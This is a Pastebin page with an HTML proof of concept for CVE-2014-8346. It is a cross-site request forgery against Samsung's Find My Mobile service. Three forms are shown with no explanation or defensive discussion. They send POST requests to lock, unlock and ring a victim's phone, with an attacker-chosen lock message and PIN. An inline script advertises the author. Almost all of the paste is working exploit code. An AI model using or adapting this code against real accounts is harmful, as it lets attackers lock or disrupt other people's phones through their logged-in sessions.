CrashBandicot

POC CVE-2014-8346 (Samsung CSRF)

Nov 4th, 2014
4,602
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 1.22 KB | None | 0 0
  1. <html>
  2. <h2>Samsung Account - Remote Mobile Device Lock CSRF VUlnerability</h2>
  3. <body><script>alert('Follow: @DosPerl')</script>
  4. <form action="http://findmymobile.samsung.com/dm/ajax/lockMyMobilePhone.do" method="POST">
  5. <input type="hidden" name="" value=""/>
  6. <input type="hidden" name="lockMessage" value="This&#32;Device&#32;has&#32;been&#32;Locked&#32;by&#32;&#64;CrashBandicot" />
  7. <input type="hidden" name="nationalityNumber" value="&#43;20" />
  8. <input type="hidden" name="restrictionNumber" value="my number phone" />
  9. <input type="hidden" name="pinCode" value="1088" />
  10. <input type="submit" value="Submit form" />
  11. </form>
  12. <h2>Samsung Account - Remote Mobile Device UnLock CSRF VUlnerability</h2>
  13. <form action="http://findmymobile.samsung.com/dm/ajax/lockreleaseMyMobilePhone.do" method="POST">
  14. <input type="submit" value="Submit form" />
  15. </form>
  16. <h2>Samsung Account - Remote Mobile Device Ring CSRF VUlnerability</h2>
  17. <form action="http://findmymobile.samsung.com/dm/ajax/ringMyMobilePhone.do" method="POST">
  18. <input type="hidden" name="" value=""/>
  19. <input type="hidden" name="message" value="Lost&#32;Device" />
  20. <input type="hidden" name="fmmVer" value="message" />
  21. <input type="submit" value="Submit form" />
  22. </body>
  23. </html>
Advertisement
Add Comment
Please, Sign In to add comment